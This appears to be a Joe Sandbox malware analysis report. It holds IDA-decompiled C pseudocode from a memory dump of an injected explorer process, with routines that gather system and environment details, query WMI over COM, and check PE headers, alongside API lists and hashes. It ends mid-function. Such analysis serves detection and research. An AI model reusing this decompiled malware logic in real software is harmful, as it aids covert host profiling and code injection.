CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0x34f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0x34fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0x34fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0x34f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0x34f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0x34f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0x34f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0x34f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0x34f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0x34f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}

0x0008d01f
0x0008d029
0x0008d035
0x0008d03a
0x0008d03f
0x0008d3ff
0x0008d3ff
0x0008d04c
0x0008d052
0x0008d057
0x0008d05d
0x0008d06d
0x0008d079
0x0008d079
0x0008d082
0x0008d088
0x0008d08a
0x0008d093
0x0008d093
0x0008d09f
0x0008d0a3
0x0008d0a8
0x0008d0ae
0x0008d0b7
0x0008d0c5
0x0008d0cc
0x0008d0d1
0x0008d0d1
0x0008d0d2
0x0008d0b9
0x0008d0b9
0x0008d0b9
0x0008d0d8
0x0008d0e3
0x0008d0f1
0x0008d0f7
0x0008d0fb
0x0008d101
0x0008d108
0x0008d10f
0x0008d113
0x0008d11a
0x0008d11b
0x0008d128
0x0008d12a
0x0008d12f
0x0008d13c
0x0008d13e
0x0008d13e
0x0008d140
0x0008d14a
0x0008d156
0x0008d166
0x0008d16c
0x0008d172
0x0008d174
0x0008d185
0x0008d18b
0x0008d191
0x0008d196
0x0008d19c
0x0008d1a2
0x0008d1a7
0x0008d1ac
0x0008d1ac
0x0008d1b2
0x0008d1b2
0x0008d1bb
0x0008d1c7
0x0008d1cf
0x0008d1d3
0x0008d1d3
0x0008d1cf
0x0008d1d7
0x0008d1dd
0x0008d1e3
0x0008d1ea
0x0008d1fb
0x0008d201
0x0008d209
0x0008d210
0x0008d223
0x0008d229
0x0008d22e
0x0008d231
0x0008d234
0x0008d23a
0x0008d240
0x0008d242
0x0008d248
0x0008d251
0x0008d254
0x0008d254
0x0008d257
0x0008d25f
0x0008d26a
0x0008d270
0x0008d261
0x0008d263
0x0008d263
0x0008d279
0x0008d279
0x0008d27f
0x0008d287
0x0008d292
0x0008d297
0x0008d29d
0x0008d29f
0x0008d2ac
0x0008d2ad
0x0008d2ae
0x0008d2b9
0x0008d2bb
0x0008d2c2
0x0008d2c2
0x0008d2cc
0x0008d2d1
0x0008d2d6
0x0008d2d6
0x0008d2dc
0x0008d2e3
0x0008d2e4
0x0008d2f1
0x0008d304
0x0008d309
0x0008d30e
0x0008d317
0x0008d317
0x0008d31d
0x0008d322
0x0008d328
0x0008d32e
0x0008d333
0x0008d33c
0x0008d33e
0x0008d345
0x0008d345
0x0008d34b
0x0008d353
0x0008d358
0x0008d359
0x0008d35e
0x0008d367
0x0008d369
0x0008d374
0x0008d374
0x0008d37d
0x0008d385
0x0008d38c
0x0008d391
0x0008d3a0
0x0008d3b8
0x0008d3bf
0x0008d3cd
0x0008d3df
0x0008d3e6
0x0008d3f3
0x00000000

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetCurrentProcessId.KERNEL32 ref: 0008D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
GetCurrentProcess.KERNEL32 ref: 0008D09F
GetLastError.KERNEL32 ref: 0008D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
GetLastError.KERNEL32 ref: 0008D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
GetCurrentProcess.KERNEL32 ref: 0008D20E
memset.MSVCRT ref: 0008D229
GetVersionExA.KERNEL32(00000000), ref: 0008D234
GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
GetSystemInfo.KERNEL32(?), ref: 0008D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287

Strings

USERPROFILE, xrefs: 0008D2E4, 0008D312
%s\%s, xrefs: 0008D2F9
TEMP, xrefs: 0008D328, 0008D333, 0008D344
SystemDrive, xrefs: 0008D353, 0008D35E, 0008D373
TEMP, xrefs: 0008D2F3

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3876402152-2706916422
Opcode ID: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
Opcode Fuzzy Hash: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x0008db45
0x0008db4b
0x0008db52
0x0008db55
0x0008db58
0x0008db5d
0x0008db5f
0x0008db64
0x0008dfac
0x0008dfac
0x0008db71
0x0008db73
0x0008db76
0x0008db79
0x0008df91
0x0008df97
0x0008dfa1
0x00000000
0x0008dfa6
0x0008db84
0x0008db8b
0x0008db92
0x0008db95
0x0008db9a
0x0008db9c
0x0008db9f
0x0008dba2
0x0008dba3
0x0008dbac
0x0008dbb2
0x0008dbb5
0x0008dbbe
0x0008dbc3
0x0008dbc8
0x0008dbdf
0x0008dbec
0x0008dbef
0x0008dbf6
0x0008dbfb
0x0008dc02
0x0008dc07
0x0008dc0e
0x0008dc10
0x0008dc1c
0x0008dc1f
0x0008dc21
0x0008df81
0x0008df82
0x0008df8b
0x00000000
0x0008df8b
0x0008dc27
0x0008dc2a
0x0008dc2d
0x0008dc30
0x0008dc32
0x0008df4d
0x0008df50
0x0008df53
0x0008df55
0x0008df77
0x0008df7c
0x0008df57
0x0008df5a
0x0008df65
0x0008df6c
0x0008df6c
0x00000000
0x00000000
0x00000000
0x00000000
0x0008dc38
0x0008dc38
0x0008dc4a
0x0008dc4d
0x0008dc4f
0x00000000
0x00000000
0x0008dc57
0x0008dc5a
0x0008dc5d
0x0008dc60
0x0008dc63
0x0008dc66
0x00000000
0x00000000
0x0008dc6c
0x0008dc7a
0x0008dc7d
0x0008dc7f
0x0008dc98
0x0008dca7
0x0008dcaf
0x0008dcaf
0x0008dcb2
0x0008dcb9
0x0008dcbd
0x0008dcc3
0x0008dcc5
0x0008df35
0x0008df3b
0x0008df41
0x0008df44
0x0008df44
0x00000000
0x0008df44
0x0008dcd4
0x0008dce8
0x0008dcec
0x0008dcee
0x0008dcf3
0x0008df02
0x0008df08
0x0008df13
0x0008df1e
0x0008df24
0x0008df2a
0x0008df2d
0x00000000
0x0008df2d
0x0008dcf9
0x0008ded0
0x0008ded0
0x0008ded3
0x0008ded6
0x00000000
0x00000000
0x0008dd01
0x0008dd09
0x0008dd10
0x0008dd16
0x0008dd18
0x00000000
0x00000000
0x0008dd21
0x0008dd36
0x0008dd3c
0x0008dd45
0x0008dd48
0x0008dd4b
0x0008dd4d
0x0008dec3
0x0008dec6
0x0008decf
0x0008decf
0x00000000
0x0008decf
0x0008dd5d
0x0008dd60
0x0008dd67
0x0008dd6d
0x0008dd70
0x0008dd73
0x0008dd76
0x0008dd79
0x0008ddb5
0x0008ddb5
0x0008ddb8
0x0008de64
0x0008de78
0x0008de88
0x0008de8c
0x0008de8e
0x0008dea5
0x0008dea9
0x0008deb2
0x0008debd
0x00000000
0x0008debd
0x0008de94
0x0008de95
0x0008de9a
0x0008de9a
0x0008de9c
0x0008de9d
0x0008dea2
0x00000000
0x0008dea2
0x0008ddbe
0x0008ddbe
0x0008ddc1
0x0008de2c
0x0008de40
0x0008de50
0x0008de54
0x0008de56
0x00000000
0x00000000
0x0008de5c
0x0008de5d
0x00000000
0x0008de5d
0x0008ddc3
0x0008ddc3
0x0008ddc6
0x00000000
0x00000000
0x0008ddc8
0x0008ddcb
0x00000000
0x00000000
0x0008ddcd
0x0008ddcd
0x0008ddd3
0x0008ddef
0x0008ddfe
0x0008de07
0x0008de0c
0x0008de0f
0x0008de15
0x0008de15
0x0008de1a
0x0008de26
0x00000000
0x0008de26
0x0008ddd8
0x00000000
0x0008ddd8
0x0008dd7b
0x0008dda2
0x0008dda7
0x0008ddac
0x0008ddae
0x0008ddae
0x00000000
0x0008ddac
0x0008dd7d
0x0008dd7d
0x0008dd80
0x00000000
0x00000000
0x0008dd86
0x0008dd86
0x0008dd89
0x00000000
0x00000000
0x0008dd8f
0x0008dd8f
0x0008dd92
0x00000000
0x00000000
0x0008dd98
0x0008dd9b
0x00000000
0x00000000
0x0008dd9d
0x00000000
0x0008dd9d
0x0008dedf
0x0008dee5
0x0008deeb
0x0008deee
0x0008def1
0x0008def1
0x0008def4
0x0008def5
0x0008def8
0x0008defa
0x00000000
0x00000000
0x0008df4a
0x0008df4a
0x00000000
0x0008df4a
0x0008dc81
0x0008dc87
0x00000000
0x0008dc87
0x0008df47
0x00000000
0x0008dbca
0x0008dbcf
0x0008dbd4
0x00000000
0x0008dbd8

APIs

Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
SysFreeString.OLEAUT32(?), ref: 0008DF82
SysFreeString.OLEAUT32(?), ref: 0008DF8B

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

FALSE, xrefs: 0008DDAE
TRUE, xrefs: 0008DDA7

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: 14469509326b1245f60a3822b604f0d2155a7e129896877e627dd39ddefd1d86
Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
Opcode Fuzzy Hash: 14469509326b1245f60a3822b604f0d2155a7e129896877e627dd39ddefd1d86
Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
